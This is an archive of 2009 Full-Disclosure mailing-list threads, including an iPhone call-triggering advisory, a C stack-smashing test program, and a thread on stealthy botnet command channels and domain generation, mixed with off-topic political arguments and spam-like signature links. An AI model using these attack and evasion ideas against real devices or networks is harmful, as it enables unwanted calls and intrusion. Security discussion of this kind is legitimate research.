SMS application (in order to handle a SMS URI [2]). The SMS application can be launched through placing a SMS URI as the source of an iframe. This is shown in the first proof-of-concept exploit below. Further investigation showed that this behavior can be reproduced by launching other applications such as: Maps, YouTube, and iTunes. Launching these applications can be achieved through loading special URLs using the meta refresh tag. This is shown in the second proof-of-concept exploit below. We also discovered that the bug can also be triggered through popup windows (e.g. javascript alert). In this situation the initiating app does not need to be termianted in order to active the call. Finally, we discovered a second bug that can be used to perform malicious phone calls that cannot be prevented or canceled by the victim. This bug allows the attacker to freez the GUI (graphical user interface) for a number of seconds. While the GUI is frozen the call progresses in the background and cannot be stopped by the victim user. Freezing the GUI is achieved by passing a very long phone number to the SMS
[Full-disclosure] vulnerability cause of suicide
Computer vulnerability cause of suicide http://www.theregister.co.uk/2009/06/09/lxlabs_funder_death/ This is the first time I heard about something like this happening. -- http://www.jewelerslounge.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FFSpy, a firefox malware PoC
On the iPhone a new app came out called MobileSpy. Designed to secretly record all activity on the iPhone. OMG The iPhone now has spyware etc. No the user must 1. Jailbreak his phone 2. Download and install the Mobilespy application. Recently a person told me that stupidity is a capital crime. We see that evermore here. These days we are worried about drive-by downloads. Spyware in the form of Mozilla Firefox has been an issue for a while. James On Tue, May 26, 2009 at 9:28 AM, Shell Code technobus...@gmail.com wrote: On Wed, May 20, 2009 at 6:12 AM, saphex sap...@gmail.com wrote: I think this is interesting, http://myf00.net/?p=18 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ I fail to understand what is new or interesting in this POC. If a person with malicious intent gains so much access to a system that he can put his files or firefox plugins, modify existing files, etc. then he can do anything he wants anyway. This is nothing new. It was well known always that Firefox plugins can also be made to do malicious things such as steal passwords, sniff data before it gets encrypted in SSL, etc. Absolutely nothing new. The same holds true for a user downloading malicious software on his own and running it on his system. It is true that most users don't verify the source code before running. But this is not anything specific to Firefox. This holds true for any open source or closed source software users download. So, again FFSpy sniffing data is nothing new. From the POC it seems that somehow the attacker has to gain physical access to the system or do some social engineering attack to fool the user in installing or modifying his existing plugins. The PoC does not explain how this is done. This is like claiming, I have found an interesting attack which involves modifying XYZ program or DLL or script on the system that would sniff data and send it to a remote server. I name it ComputerSPY. This is very lame. Of course if you have access to modify or create stuff in the system, you can do anything. Nothing new at all. What is the point of the POC? What is the PoC trying to achieve? Is the POC trying to tell us something that we already don't know? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com http://www.jewelerslounge.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Who is destroying our internet?
Whenever a major service goes down people speculate whether it was hacked or not. This past week we saw Google go down And now Avsim was killed by hackers. http://news.digitaltrends.com/news-article/19942/flight-sim-site-killed-by-hackers While these two events are not related in anyway, I am wondering why people don't create backup off site or don't plan normal failsafe's when there site is as big as Google (we have seen a few popular sites die because of this mistake) James -- http://www.jewelerslounge.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Major Greek bank sites with SSL vulnerable to XSS and open redirects
Why are these banks still using ASP? It's insecure by default! On Sun, May 10, 2009 at 8:46 PM, xssed secur...@xssed.com wrote: Hello there, This story may interest you: http://www.xssed.com/news/96/Major_Greek_bank_sites_with_SSL_vulnerable_to_XSS_and_open_redirects/ Regards, XSSed Staff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anand A has sent you a private message
I love you too! On Tue, Apr 28, 2009 at 12:12 PM, Anand A nore...@ci.faniq.com wrote: [image: FanIQ] http://FanIQ.com/user/aanand01/connect/247743246 Anand A has sent you a private message Click to read messagehttp://FanIQ.com/user/aanand01/conne%0A+ct/247743246 [image: Read private message]http://FanIQ.com/user/aanand01/connect/247743246 Please read it or Anand will think you ignored this :( This message has been forwarded at the request of aanan...@gmail.com. To block all emails from FanIQ, please click herehttp://www.faniq.com/unsubscribe.php?invite_id=247743246stkn=6b58f88236c450eeb5d9cfe8c061fe4d. FanIQ is located at 604 mission St, Suite 600, San Francisco, CA 94105, USA. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Kaminsky: MS security assessment tool is a 'game changer'
I want to gets some hands on with that tool. On Mon, Mar 23, 2009 at 1:01 PM, Fionnbharr tho...@gmail.com wrote: Thanks for the link, would be terrible if I missed something Kaminsky said. 2009/3/23 Ivan . ivan...@gmail.com: In case anyone missed it http://www.theregister.co.uk/2009/03/20/microsoft_crash_tool/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/Watches.asp?Brand=71 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google to base ads on surfing behaviour
When they bought doubleclick I knew this would happen On Tue, Mar 17, 2009 at 12:59 AM, Nick FitzGerald n...@virus-l.demon.co.ukwrote: Bipin Gautam wrote: google is evil : http://news.zdnet.co.uk/internet/0,100097,39625962,00.htm That's news?8-) These ads will associate categories of interest say sports, gardening, cars, pets with your browser, based on the types of sites you visit and the pages you view, ... As with any other cookie, this tracking file can be cleared by the user at any time. By visiting Google's ad-preferences page, the user can opt out of having their surfing habits tracked, or input their own preferences for the subject matter of ads they would like to see. However, as clearing the browser's cookies would effectively remove the opt-out cookie itself, Google has also released a plug-in for browsers that provides a permanent opt-out from the service. ... Whatever happened to default deny? Oh, that's right -- it wouldn't be in _Google's_ interest to require surfers to opt into Google breaching their privacy. As the US government doesn't seem to care much, if at all, about protecting the privacy rights of its citizens (in fact, do US citizens actually have any legally-protected privacy rights worth talking about?), perhaps the EU should step up here and fine the crap out of Google until it fixes this latest egregious assault on our privacy... ... And would it be churlish to point out that Google is breaking its own principles with this move? Bipin has already alluded to the much-vaunted do no evil doctrine (actually, it is You can make money without doing evil -- point six at: http://www.google.com/corporate/tenthings.html and arguably does not preclude but you can make more money by doing evil if you read the whole thing), but there are others, perhaps most pertinent here are in: http://www.google.com/corporate/software_principles.html Software Principles At Google, we put a lot of thought into improving your online experience. We're alarmed by what we believe is a growing disregard for your rights as computer users. We've seen increasing reports of spyware and other applications that trick you in order to serve you pop-up ads, connect your modem to expensive toll numbers or hijack your browser from the site you're trying to visit. Yet it seems that it is acceptable for Google to breach reasonable expectations of privacy behind the scenes (these principles seem aimed at client-side, rather than server-side, shenanigans -- h...). We do not see this trend reversing itself. In fact, it is getting worse. As a provider of services and monetization for users, advertisers and publishers on the Internet, we feel a responsibility ...to ensure those trends continue? No -- actually, it continues: to be proactive about these issues. So, we have decided to take action. As a first step, we have outlined a set of principles we believe our industry should adopt and we're sharing them to foster discussion and help solve the problem. We intend to follow these guidelines ourselves with the applications we distribute (such as the Google Toolbar and Google Desktop). And because we strongly believe these principles are good for the industry and users worldwide, we will encourage our current and prospective business partners to adopt them as well. ...but again, we won't apply these principles to the service side of our industry and actions. How gloriously myopic, or is that two-faced? The second of these proposed software principles is described thus: UPFRONT DISCLOSURE When an application is installed or enabled, it should inform you of its principal and significant functions. And if the application makes money by showing you advertising, it should clearly and conspicuously explain this. This information should be presented in a way that a typical user will see and understand -- not buried in small print that requires you to scroll. For example, if the application is paid for by serving pop-up ads or sending your personal data to a third party, that should be made clear to you. But, again, not if it's Google, DoubleClick, et al. twiddling bits on the back-end... And a few sections later: SNOOPING If an application collects or transmits your personal information such as your address, you should know. We believe you should be asked explicitly for your permission in a manner that is obvious and clearly states what information will be collected or transmitted. For more detail, it should be easy to find a privacy policy that discloses how the information will be used and whether it will be shared with third parties. But, again, not if it's Google, DoubleClick, et al. twiddling bits on the back-end... ... And to add another security-related issue to this thread, I'd rather that Google and
Re: [Full-disclosure] The BBC acquired a botnet, but was it legal? - Update
No it's not acceptable! But they seem to do what ever suits them! On Mon, Mar 16, 2009 at 12:52 AM, Ivan . ivan...@gmail.com wrote: According to Struan Robertson, a technology lawyer with Pinsent Masons, in a posting on Out-Law.com, the BBC's statement that the activity would only be illegal if those behind it had criminal intent is not true. Robertson said The BBC appears to have broken the Computer Misuse Act by causing 22,000 computers to send spam. It does not matter that the emails were sent to the BBC's own accounts and criminal intent is not necessary to establish an offence of unauthorised access to a computer. However, Robertson does not think the BBC will be punished for the action because the BBC's actions probably caused no harm. http://www.h-online.com/security/The-BBC-acquired-a-botnet-but-was-it-legal-Update--/news/112834 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] BBC cybercrime probe backfires
I agree! Why can't another people hack into computers to show This is such BS and the BBC should be hit hard by what they did. On Fri, Mar 13, 2009 at 7:18 AM, Ivan . ivan...@gmail.com wrote: The BBC hacked into 22,000 computers as part of an investigation into cybercrime but the move quickly backfired, with legal experts claiming the broadcaster broke the law and security gurus saying the experiment went too far. http://www.smh.com.au/news/technology/security/bbc-cybercrime-probe-backfires/2009/03/13/1236447465056.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Notice to all employees
I see it's a combo of an old one I saw.. Nice for the weekend. On Sat, Feb 28, 2009 at 8:40 AM, Peter Besenbruch p...@lava.net wrote: On Friday 27 February 2009 16:42:27 Stephen Menard wrote: Original Message Subject: FW: Notice to all employees Date: Fri, 27 Feb 2009 15:42:20 -0300 Due to the current financial situation caused by the slowdown of the economy, Management has decided to implement a scheme to put workers of 40 years of age and above on early retirement. This scheme will be known as RAPE (Retire Aged People Early). It's cute. Checking the Web, this one has been making the rounds for about a month. Very cute. -- Hawaiian Astronomical Society: http://www.hawastsoc.org HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows 7 or KDE4?
Ha, What happends when people see that they have to use wine to launch windows exe's? On Fri, Feb 27, 2009 at 10:49 AM, yersinia yersinia.spi...@gmail.comwrote: Wonderful. On Fri, Feb 27, 2009 at 1:49 AM, Ivan . ivan...@gmail.com wrote: http://olylug.org/read.php?73,13757 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Weird traffic
Welcome to FD sometimes there is some fear mongering On Fri, Feb 27, 2009 at 1:04 AM, julio sanchez pete.sanc...@gmail.comwrote: No virus in there, it's a normal cap file... 2009/2/26 srl security.research.l...@gmail.com Don't open the pcap file in wireshark ! Is exploiting a hole in the whireshark you will pe pwned !!! On Wed, Feb 25, 2009 at 9:56 PM, julio sanchez pete.sanc...@gmail.comwrote: Here's the cap file 10.240 is the A-V server. You can see various ARP loop scan Regards Pete ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Weird traffic
If you have a large paste can you please put it in a pastebin. On Wed, Feb 25, 2009 at 7:50 PM, julio sanchez pete.sanc...@gmail.comwrote: No IDS alert yet. What alerted us was the constant ARP loop scan on various vista sp1 box while we was monitoring the network I'll send a pcap in one hour or twoThanks 2009/2/25 B Null bn...@offenseindepth.com Can you provide a pcap with the suspect traffic isolated? Also, what alerted you to the odd behavior? Did the traffic flag an IDS alert? bNull On Wed, Feb 25, 2009 at 9:27 AM, julio sanchez pete.sanc...@gmail.comwrote: Hi, We're experiencing some weird arp traffic on our network, some box scan constantly the subnets with loop who-has request All the box are all windows vista sp1 fully patched. We did format all the supect box, and isolate them on a vlan, to reinstall vista, updates, kaspersky, then we put it back on the network, and still some ramdom freshly formated box scanning the network. We find out that Vista will do an arp scan when it search for a network printer, but it does this once. The problem we have is an almost permanent arp scan on various boxs. We know that some worm was hitting some network around the world with the smb vulnerability, but all of our boxs are fully updated. Have you experienced something like this before, or it seems to be legit traffic ? Can this be a worm or something related ? Thanks in advance Pete ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Oh Yeah, botnet communications
II would use something like UDP or IGMP and modify the packets slightly. I know that most routers will just pass them on and not worry about a few weird things. On Mon, Feb 23, 2009 at 2:56 PM, John C. A. Bambenek, GCIH, CISSP bambenek.info...@gmail.com wrote: Yes, its possible, I mapped out something on a high level that would use rss/xml and would evade most detection methods on the network... Problem comes in is that stuff gets detected at infection-time and gets reverse engineered. Stealthy botnets is easy, stealthy infection is trickier. On 2/19/09, T Biehn tbi...@gmail.com wrote: God Valdis, Dont concentrate on the mundane, the core issue is the unpredictable nature of it. You have them all coordinate reading the news at 12:00 AM GMT. You build some silly algorithm that ensures they pick the right article. -Travis On Thu, Feb 19, 2009 at 11:34 PM, valdis.kletni...@vt.edu wrote: On Thu, 19 Feb 2009 23:13:38 EST, T Biehn said: You know how the current amateur botnet offerings are basing domain lists off the current time to allow the 'good guys' to prepare? Why not base the seed off something like a news RSS feed? I asked some whitehats when I was ruined in Washington DC and they couldn't tell me. If you're the botnet owner, you need to have some way to know what domain name your botnet will be looking for, so you can register it. If you look at 11:06AM, see the top news story is something about Obama flipping the Republican party the bird, and computes the domain name to register based on that, but then at 11:07AM some editor at CNN pulls that headline and replaces it with Obama sends obscene gesture to Republicans before your bots wake up at 11:08AM and check what domain to use, you're screwed. -- Sent from my mobile device ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ICQ 6 protocol bug?
ICQ is known to have a few remote bugs. I use meebo.com instead of a client due to these issues. On Fri, Feb 13, 2009 at 5:57 PM, Leon Juranic leon.jura...@infigo.hrwrote: Hi, It could be quite possible, although, I can't confirm it. But, after analysis of recent ICQ6 vulnerability, I'm under impression that there are more similar vulnerabilities in it. ICQ6 vulnerability: http://www.infigo.hr/hr/in_focus/advisories/INFIGO-2008-04-08 Regards, Leon Juranic -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Darren Reed Sent: Friday, February 13, 2009 10:01 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] ICQ 6 protocol bug? For some time now I've seen ICQ receive messages, from unknown people, occassionally make the client core dump'. The messages are often gibberish - more like the ASCII characters from someone trying to make it execute something it shouldn't. My interpretation of this is unknown parties are trying to exploit a bug in ICQ6 (it may work on Win2k or Win98...) but I might be wrong. I need to fire up wireshark to see what actually get sent. Has anyone else seen this? Or have details on what the hack is? Google found some hits for old bugs, older than ICQ6 Darren -- Darren Reed darr...@reed.wattle.id.au ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploiting buffer overflows via protected GCC
I would recommend doing the following things.
1. Ask on the Ubuntu GCC list what protection is implemented. (Or just look
at the source)
2. Use GCC to see where the execution is being redirected and so you can
have a better visual of whats going on.
3. Are you sure the stack is executable?
On Sat, Feb 14, 2009 at 12:30 AM, Marcus Meissner meiss...@suse.de wrote:
On Fri, Feb 13, 2009 at 11:50:11AM -0500, Jason Starks wrote:
I came across a problem that I am sure many security researchers have
seen
before:
ja...@uboo:~$ cat bof.c
#include stdio.h
#include string.h
int main()
{
char buf[512];
memset(buf, 'A', 528);
return 0;
}
ja...@uboo:~$
ja...@uboo:~$ ./bof
*** stack smashing detected ***: ./bof terminated
=== Backtrace: =
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb7f08548]
ja...@uboo:~$
I have googled my brains out for a solution, but all I have gathered is
that
my Ubuntu's gcc is compiled with SSP and everytime I try to overwrite the
return address it also overwrites the canary's value, and triggers a stop
in
the program. I've disassembled it and anybody who can help me probably
doesn't need me to explain much more, but I would like to know a way to
get
this. There seems to be some people on this list who may know something
on
how to exploit on *nix systems with this protection enabled.
I do not want to just disable the protection and exploit it normally, I
want
Perhaps you should learn first exactly _what_ caught your buffer overflow.
Hint: It was not SSP aka -fstack-protector.
Ciao, Marcus
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
http://www.goldwatches.com/
http://www.jewelerslounge.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Windows 7 UAC compromised
http://www.istartedsomething.com/20090130/uac-security-flaw-windows-7-beta-proof/ Windows is like swiss cheese! -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Closure of political threads
I second. This is a security mailing list and should stick to topic. On Mon, Jan 19, 2009 at 7:31 PM, andrew. wallace andrew.wall...@rocketmail.com wrote: I'm calling for the closure of political threads on full-disclosure so we can get back to business. Andrew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The war in Palestine
Now that the conflict is over can we get back to security? On Sun, Jan 18, 2009 at 9:16 AM, Avraham Schneider avri.schnei...@gmail.com wrote: s/neiboring/neighboring/g On Sun, Jan 18, 2009 at 9:09 AM, Avraham Schneider avri.schnei...@gmail.com wrote: On Sun, Jan 18, 2009 at 8:18 AM, j-f sentier j.sent...@gmail.com wrote: You can go to the Kneset website and find out. Oh so there's a website dedicated to the one who didn't get corrupted ? Oh come on , you know what i'm talking about your country is driven by that . There is corruption everywere - you think there is no corruption in any of the surrounding arab countries? Israel has a legal system and when one is found corrupt, he pays his time - even if he was a minister, or a president. This is something that can only happen in a democracy - something the neiboring arab countries should adopt. Oh Oh Oh, you dont like to play the propaganda game with me ? No I don't. i understand that :) Die slowly with lots of pain. I plan to live on for many more years... If you have a problem with that, you can try and change that but I don't think that would be good for your health... 2009/1/18 Avraham Schneider avri.schnei...@gmail.com On Sun, Jan 18, 2009 at 8:01 AM, j-f sentier j.sent...@gmail.comwrote: haha, how much time this took you to say that ? You're paied to make propaganda on FD this more than clear. you dont answer on any real questions You obviously ignore everything I write , you say always the same stuff No - I answer your questions, and I correct false claims made by you. , aka yeah but hamas was elected by palestinian so palestinian should die When did I say that? , but know what , not talking about war anymore here, Great! just your polititian. Give me just one name of an isreali president or first minister who didn't end up his mandate with corruption charges. You can go to the Kneset website and find out. and what you still promoting them ? Not promoting any of them - just responding to your false claims and propaganda. Oh Oh Oh, you dont like to play the propaganda game with me ? No I don't. 2009/1/18 Avraham Schneider avri.schnei...@gmail.com I guess I can't prove that I don't, so what can I say... Do you have anything you find incorrect in what I have responded to you, or you are done with your nonsense and the list can go back to being a Computer Security Mailing List? On Sun, Jan 18, 2009 at 7:32 AM, j-f sentier j.sent...@gmail.comwrote: You are paid to say that Avraham, and it's a shame.2009/1/18 Avraham Schneider avri.schnei...@gmail.com On Sun, Jan 18, 2009 at 2:00 AM, andrew. wallace andrew.wall...@rocketmail.com wrote: On Sat, Jan 17, 2009 at 11:48 PM, Avraham Schneider avri.schnei...@gmail.com wrote: they don't have the time to find out if it is a UN building I find that hard to believe with the amount of intelligence the Israeli's have. During war, when you are fired at, you shoot back without asking questions. On Sat, Jan 17, 2009 at 11:48 PM, Avraham Schneider avri.schnei...@gmail.com wrote: and/or if there are civilians inside or not. Of course there are civilians inside its a UN building. Then they should make sure that no terrorists fire at IDF soldiers from there. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] BBC makes no reference to Cyber War only Cyber Protest
We know BBC loves to twist things. They will use different euphemisms to tune things in their own way. On Fri, Jan 16, 2009 at 12:55 AM, Yudi Rosen yr42.li...@gmail.com wrote: Does it really matter what it's called? What would you call that little incident in Estonia a couple years back? Would you call that war or protest? And even with the current Israeli/Palestinian hacking 'skirmish'...why is that just a 'protest' and not a war? Sure, BBC might call it a 'protest', but two sides fighting with each other, trying to defend their own systems yet at the same time attacking those of the other side...sounds a lot like war to me. On Thu, Jan 15, 2009 at 9:17 PM, andrew. wallace andrew.wall...@rocketmail.com wrote: On Thu, Jan 15, 2009 at 5:44 PM, Yudi Rosen yr42.li...@gmail.com wrote: What's your point? The threat is Cyber Protest, not Cyber War thats my point. about 18 hours ago from web The current threat to Information Security is 'Cyber Protest' not 'Cyber War' during the Israel-Gaza crisis. https://twitter.com/n3td3v/status/1119897172 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anybody having a mobile phone (Iphone, Nokia.) willing to test ?
Post it here and then see who reads FD with their iPhone. On Fri, Jan 16, 2009 at 12:40 AM, Ivan . ivan...@gmail.com wrote: yeah I do On Fri, Jan 16, 2009 at 3:12 AM, Thierry Zoller thie...@zoller.lu wrote: Hi, Anybody that has an Phone with a browser, Opera Mini, G1, Iphone willing to test a POC please contact me. -- http://secdev.zoller.lu Thierry Zoller ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] spam from NASA
It seems that the US Gov loves to keep it's computers secure and prosicit On Mon, Jan 12, 2009 at 4:33 PM, Juha-Matti Laurio juha-matti.lau...@netti.fi wrote: Some of us remember Support Intelligence's research in April 2007: http://blog.support-intelligence.com/2007_04_01_support-intelligence_archive.html (covered at 'Corporate spambots named and shamed' http://www.vnunet.com/vnunet/news/2188948/corporate-spambots-named-shamed) Juha-Matti Tonu Samuel [t...@jes.ee] kirjoitti: Looks this mail went to devnull: --8-- Just interesting spam I got today. It was from and actually originating from NASA. Yet visible here if someone cares: http://www.spamcop.net/sc?id=z2486413060z414e4d86a6a209ebc1682975316af239z Tõnu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] It's time for me to go now
Goodbye... You will be missed by many On Mon, Jan 12, 2009 at 9:00 AM, quispiam lepidus quispiam.lepi...@gmail.com wrote: You are, the weakest link. Goodbye. On Mon, Jan 12, 2009 at 12:45 PM, n3td3v xploita...@gmail.com wrote: I don't know how to hack and I don't have any technical abilities I must go now before MI5 take me away in a van and dump my body in the sea. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ImmunitySec is an NSA front.
Well it's now an Israeli Plot. On Thu, Jan 8, 2009 at 9:52 PM, ChromeSilver chromesil...@exec-labs.comwrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear Prof. Chatner, I don't know what you mean, on GoogleEarth it's 3D-Building. Cheers, ChromeSilver If light be the brightest light... Wherfore then doth it shadows cast? - -R.Rohonyi Professor Micheal Chatner schrieb: I have recently witnessed a conspiracy by ImmunitySEC headed by the Israeli spy David Aitel. http://maps.google.com/maps?q=IMMUNITYSEC,+miami,+floe=utf-8client=firefox-aie=UTF8ll=25.783508,-80.140972spn=0,359.818039z=13iwloc=Alayer=ccbll=25.783635,-80.140995panoid=RuVREzzTYFjcmaegYtzhRgcbp=12,441.86166752012093,,0,5 As you can see their entire road is BLURRED OUT. This is obviously a tactic to keep out the Chinese spies that they time and time again sell 0day to. It is too complicated to explain now but I will have more research later. Professor Micheal Chatner, M.D. CISSP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQIVAwUBSWZZi4VSCfUHd8OQAQK7ew/8C3V94vIJQvK9CtxWvYIe+707a4NNDzRV JH2dgMrgKZFUAWkbbGiOmBUiW5Mz4b8oQN0eCvYxD/hQoDTtRAEuG6u9x9lwmcsb +sRf9qpzOp5AQdEe2neZMQGp78E8hj1iXuTKlazAibrpal+PIKDoB7QGQgiLdsEm EPDfnhWoTg+NavaJyUOvW0zHmEq5zAx1jMs2uv8MENm4eciJcLo3MQCk3+d2M0s2 roX23ipRuemAPzVPMUwVYDrxfd/AbRxShhSzvejm969hFvYXzyHrSy1EZ9cOFY/e 1UNhsYaFEKE3ZucL8zCiE/p9OzG77dZdSVz6qNCeTZCespgvCU8Qzuqcz/onqBoZ Mc+9vTXTHbA0EcustCYLIvkFLrP8vND/wx3YR/+V5GaxAzZCvEqJ+0txz9dWJO14 TwSnPtOoPL/NXyj6he5Dz4UVd1s/FTS5mHSReZR1bVKaiBSUxLivvW39M5WkdMG7 